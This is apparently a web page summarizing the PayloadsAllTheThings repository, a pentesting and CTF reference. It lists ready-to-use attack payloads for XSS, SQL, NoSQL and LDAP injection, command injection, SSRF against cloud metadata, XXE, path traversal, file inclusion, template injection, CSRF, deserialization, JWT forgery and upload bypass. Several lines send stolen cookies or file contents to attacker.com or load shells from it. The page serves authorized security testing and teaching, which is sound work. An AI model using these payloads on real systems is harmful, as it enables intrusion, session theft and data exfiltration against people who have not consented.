PayloadsAllTheThings
PayloadsAllTheThings is a massive community-maintained GitHub repository containing attack payloads, security bypasses, and exploitation techniques organized by vulnerability type. Essential reference for pentesting, CTF challenges, and web application security research.
Repository Structure
Sección titulada «Repository Structure»| Path | Purpose |
|---|---|
/XSS/ | Cross-site scripting payloads (reflected, stored, DOM) |
/SQL Injection/ | Database injection across engines (MySQL, PostgreSQL, MSSQL, Oracle, SQLite) |
/Command Injection/ | OS command execution payloads |
/SSRF/ | Server-side request forgery exploits |
/XXE/ | XML External Entity attack payloads |
/Directory Traversal/ | Path traversal and traversal bypass techniques |
/File Inclusion/ | LFI and RFI exploitation patterns |
/Server Side Template Injection/ | SSTI payloads across frameworks |
/CORS/ | Cross-Origin Resource Sharing misconfigurations |
/CSRF/ | Cross-Site Request Forgery techniques |
/IDOR/ | Insecure Direct Object Reference patterns |
/Deserialization/ | Java, PHP, Python deserialization gadgets |
XSS Payloads
Sección titulada «XSS Payloads»Reflected XSS
Sección titulada «Reflected XSS»<!-- Basic alert -->
<script>alert('XSS')</script>
<!-- Attribute context -->
"><script>alert('XSS')</script>
<!-- Event handler -->
<img src=x onerror="alert('XSS')">
<!-- Unicode/encoding bypass -->
<script>alert(String.fromCharCode(88,83,83))</script>
<!-- SVG context -->
<svg onload="alert('XSS')">Stored XSS
Sección titulada «Stored XSS»<!-- Image tag with event -->
<img src=x onerror="fetch('http://attacker.com/steal.php?cookie='+document.cookie)">
<!-- SVG injection -->
<svg/onload="new Image().src='http://attacker.com/log?c='+btoa(document.cookie)">
<!-- HTML5 data attribute -->
<div data-x="`>onclick="eval(this.dataset.x)">Click</div>
<!-- Meta redirect -->
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">DOM XSS
Sección titulada «DOM XSS»// Vulnerable pattern
document.getElementById('output').innerHTML = userInput;
// Payload (if input is: <img src=x onerror="alert('DOM XSS')">)
// Will execute
// Source → Sink patterns
// eval() injection
eval(userInput); // Payload: alert('XSS')
// setTimeout/setInterval
setTimeout(userInput, 1000); // Payload: alert('XSS')SQL Injection Payloads
Sección titulada «SQL Injection Payloads»MySQL Injection
Sección titulada «MySQL Injection»-- Basic union-based
' UNION SELECT 1,2,3,4-- -
-- Extract database name
' UNION SELECT 1,database(),3,4-- -
-- Extract table names
' UNION SELECT 1,GROUP_CONCAT(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- -
-- Extract columns
' UNION SELECT 1,GROUP_CONCAT(column_name),3,4 FROM information_schema.columns WHERE table_name='users'-- -
-- Time-based blind
' AND SLEEP(5)-- -MSSQL Injection
Sección titulada «MSSQL Injection»-- Basic union
' UNION SELECT 1,2,3,4-- -
-- Extract database name
' UNION SELECT 1,@@version,3,4-- -
-- Extract tables
' UNION SELECT 1,name,3,4 FROM sysobjects WHERE xtype='U'-- -
-- Time-based blind
'; WAITFOR DELAY '00:00:05'-- -PostgreSQL Injection
Sección titulada «PostgreSQL Injection»-- Basic union
' UNION SELECT 1,2,3,4-- -
-- Extract database
' UNION SELECT 1,current_database(),3,4-- -
-- Extract tables
' UNION SELECT 1,tablename,3,4 FROM pg_tables WHERE schemaname='public'-- -
-- Time-based blind
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END-- -SQLite Injection
Sección titulada «SQLite Injection»-- Basic union
' UNION SELECT 1,2,3,4-- -
-- Extract table names
' UNION SELECT 1,name,3,4 FROM sqlite_master WHERE type='table'-- -
-- Extract columns
' PRAGMA table_info(users);
-- Time-based blind
' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2)) LIMIT 1-- -Command Injection Payloads
Sección titulada «Command Injection Payloads»# Basic command separators
; ls -la
| whoami
|| id
& cat /etc/passwd
&& whoami
# Pipe to bash
command1 | bash
command1 | sh
# Command substitution
$(whoami)
`whoami`
# Environment variable bypass
${IFS}cat${IFS}/etc/passwd
# Glob patterns
cat /etc/passw*
# Null byte injection (older systems)
cat /etc/passwd%00.txtSSRF Payloads
Sección titulada «SSRF Payloads»# Local file access
http://127.0.0.1/admin
http://localhost:8080
http://[::1]:80/
# Internal IP ranges
http://10.0.0.1
http://172.16.0.0/12
http://192.168.0.0/16
# Cloud metadata endpoints
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/computeMetadata/v1/
# Bypass filters
http://127.1
http://localhost:80/../../admin
http://0.0.0.0
# Obfuscation
http://127.0.0.1:80/ → http://2130706433/
http://127.0.0.1 → http://0x7f.0x0.0x0.0x1XXE Payloads
Sección titulada «XXE Payloads»<!-- Basic XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data>&xxe;</data>
<!-- Blind XXE with exfiltration -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY exfil SYSTEM "http://attacker.com/log?data=%xxe;">
]>
<data>&exfil;</data>
<!-- Parameter entity injection -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/log?%file;'>">
%eval;
]>
<!-- DTD external (if not filtered) -->
<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">Directory Traversal Payloads
Sección titulada «Directory Traversal Payloads»# Basic traversal
../../../etc/passwd
..\..\..\..\windows\win.ini
# Encoded bypass
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd (double encoding)
# Null byte injection (older systems)
../../../etc/passwd%00.jpg
# Backslash bypass
..\..\..\etc\passwd
# Overlong UTF-8
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
# URL encoding variations
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswdFile Inclusion (LFI/RFI)
Sección titulada «File Inclusion (LFI/RFI)»Local File Inclusion
Sección titulada «Local File Inclusion»# Basic LFI
?page=../../../../etc/passwd
?file=....//....//....//etc//passwd
# Log poisoning (access logs, error logs)
?page=../../../var/log/apache2/access.log
# PHP wrappers
?file=php://filter/convert.base64-encode/resource=index.php
?file=php://input (POST data execution)
?file=data:text/plain,<?php phpinfo(); ?>
# Expect wrapper
?file=expect://whoamiRemote File Inclusion
Sección titulada «Remote File Inclusion»# Basic RFI
?page=http://attacker.com/shell.php
?file=http://attacker.com/payload.txt
# Protocol smuggling
?file=http://attacker.com/payload.php%00
# FTP protocol
?file=ftp://attacker.com/shell.phpSSTI Payloads
Sección titulada «SSTI Payloads»{{ 7 * 7 }} # Math evaluation
{{ config }} # Access config
{{ self.__dict__ }} # Object inspection
{{ ''.__class__.__mro__[1].__subclasses__() }} # RCE chain
{{ self._TemplateReference__context }}{{ 7 * 7 }}
{{ _self.env.registerUndefinedFilterCallback("exec")}}
{{ _self.env.getFilter("system")("id") }}ERB (Ruby)
Sección titulada «ERB (Ruby)»<%= 7 * 7 %>
<%= system("id") %>
<%= `whoami` %>Velocity
Sección titulada «Velocity»#set($x='')
#set($rt=$x.class.forName('java.lang.Runtime'))
#set($chr=$x.class.forName('java.lang.Character'))
#set($proc=$rt.getRuntime().exec('id'))CORS Misconfiguration
Sección titulada «CORS Misconfiguration»// Vulnerable backend reflects Origin header
Access-Control-Allow-Origin: *
// Or
Access-Control-Allow-Origin: [user-supplied]
// Exploit patterns
// 1. Wildcard origin
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true // Invalid combo
// 2. Null origin bypass
Access-Control-Allow-Origin: null
// 3. Subdomain bypass
Origin: attacker.victim.com
// Server accepts: *.victim.com
// 4. Regex bypass
Origin: victim.com.attacker.com
// Server regex: victim.comCSRF Payloads
Sección titulada «CSRF Payloads»<!-- Image tag (GET request) -->
<img src="http://target.com/admin/delete?id=1">
<!-- Form submission (POST) -->
<form action="http://target.com/admin/delete" method="POST">
<input type="hidden" name="id" value="1">
<input type="submit">
</form>
<script>document.forms[0].submit();</script>
<!-- Fetch request -->
<script>
fetch('http://target.com/admin/delete', {
method: 'POST',
credentials: 'include',
body: 'id=1'
});
</script>
<!-- XMLHttpRequest -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://target.com/admin/delete', true);
xhr.withCredentials = true;
xhr.send('id=1');
</script>IDOR (Insecure Direct Object Reference)
Sección titulada «IDOR (Insecure Direct Object Reference)»# Sequential ID enumeration
/api/users/1
/api/users/2
/api/users/3
# Parameter manipulation
/profile?id=100 → /profile?id=101, 102, 103...
# Hash/token prediction
/invoice?token=abc123 → /invoice?token=abc124...
# UUID/GUID patterns
/documents/550e8400-e29b-41d4-a716-446655440000
# Increment least significant digits
# Encoded ID manipulation
/user?id=MQ%3D%3D (base64: MQ== = 1)
# Try MQ%3D%3D, Mi%3D%3D, Mw%3D%3D...
# Horizontal escalation
/api/orders/my-orders (returns user 1's orders)
# Bypass: /api/orders/other-user-id/ordersDeserialization Attacks
Sección titulada «Deserialization Attacks»Java (ysoserial gadgets)
Sección titulada «Java (ysoserial gadgets)»# Generate payload with ysoserial
java -jar ysoserial.jar CommonsCollections5 'command' | base64
# Common gadget chains
CommonsCollections
CommonsCollections5
CommonsCollections6
Spring1
Spring2
JRMP
JMXBean// Vulnerable pattern
unserialize($_GET['data']);
// Gadget-based RCE
O:4:"Test":2:{s:4:"func";s:6:"system";s:3:"arg";s:2:"id";}
// Magic method exploitation
__wakeup()
__destruct()
__toString()
__get()
__set()Python Pickle
Sección titulada «Python Pickle»# Vulnerable
pickle.loads(user_data)
# RCE gadget
import pickle, subprocess
payload = pickle.dumps(subprocess.Popen(['id']))JWT Attacks
Sección titulada «JWT Attacks»// 1. Algorithm confusion (none algorithm)
// Modify header: {"alg":"none","typ":"JWT"}
// Signature: empty
// 2. Weak signature
// Crack with: hashcat, john, jwt-cracker
// 3. Public key injection
// If server uses asymmetric, swap with public key
// 4. Key confusion
// Modify alg from RS256 to HS256, use public cert as HMAC key
// 5. Expired token bypass
// Modify exp claim
// Example modified JWT
eyJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFkbWluIn0.Upload Bypass Techniques
Sección titulada «Upload Bypass Techniques»# Extension bypass
file.php → file.php.jpg
file.php → file.jpg.php
file.php → file.phtml
file.php → file.php5
file.php → file.shtml
# MIME type bypass
Actual file: PHP shell
MIME header: image/jpeg
# Double extension
file.php.jpg
file.jpg.php
# Null byte injection (older systems)
file.php%00.jpg
# Case variation
file.PhP
file.pHp
# Content-Type header manipulation
Content-Type: image/jpeg (for PHP file)
# Image polyglot
# Valid JPEG + PHP code appendedLDAP Injection
Sección titulada «LDAP Injection»# Basic LDAP injection
cn=admin*)(uid=*))(&(uid=*
# Filter becomes: (&(cn=admin*)(uid=*))(&(uid=*)(password=*))
# Wildcard bypass
cn=*
uid=*
mail=*
# Blind LDAP injection
cn=admin)(|(uid=*))(&(uid=*)
# Bypass authentication
# Time-based blind
cn=admin)(|(cn=*&(objectclass=*))NoSQL Injection
Sección titulada «NoSQL Injection»MongoDB
Sección titulada «MongoDB»// String concatenation injection
db.users.find({username: "' + username + '", password: "' + password + '"})
// Payload: {"$ne": null}
// Query becomes: {username: {$ne: null}, password: {$ne: null}}
// Operator injection
username: {$gt: ""}
password: {$gt: ""}
// JavaScript evaluation
db.users.find({$where: "this.username == '" + username + "'"})
// Payload: ' || '1'=='1
// Aggregation pipeline injection
db.collection.aggregate([{$match: {username: userInput}}])CouchDB
Sección titulada «CouchDB»// Mango query injection
{"selector": {"username": {"$eq": userInput}}}
// Payload: {"$gt": null}
// Map/reduce injection
_design/users/_view/all?key={"username":"admin"}Open Redirect
Sección titulada «Open Redirect»# Parameter-based
?redirect=http://attacker.com
?next=http://attacker.com
?url=http://attacker.com
?return=http://attacker.com
# Whitelist bypass
?redirect=http://legitsite.com.attacker.com
?redirect=http://attacker.com@legitsite.com
?redirect=http://attacker.com#@legitsite.com
?redirect=//attacker.com (protocol-relative URL)
# Unicode/encoding bypass
?redirect=http://%61%74%74%61%63%6b%65%72.com
?redirect=http://attacker.com%00legitsite.com
# JavaScript protocol
?redirect=javascript:alert('XSS')Finding PayloadsAllTheThings
Sección titulada «Finding PayloadsAllTheThings»- GitHub: https://github.com/swisskyrepo/PayloadsAllTheThings
- Regular Updates: Community maintains current bypasses and techniques
- Local Mirror: Clone for offline reference during assessments
- Search: Use repository search to find payloads by vulnerability type
Best Practices
Sección titulada «Best Practices»- Always test in authorized environments only
- Understand the payload before using it
- Combine techniques for maximum effectiveness
- Keep the repository updated regularly
- Document payloads used in your assessments
- Modify payloads for target-specific contexts
- Validate findings with proper exploitation steps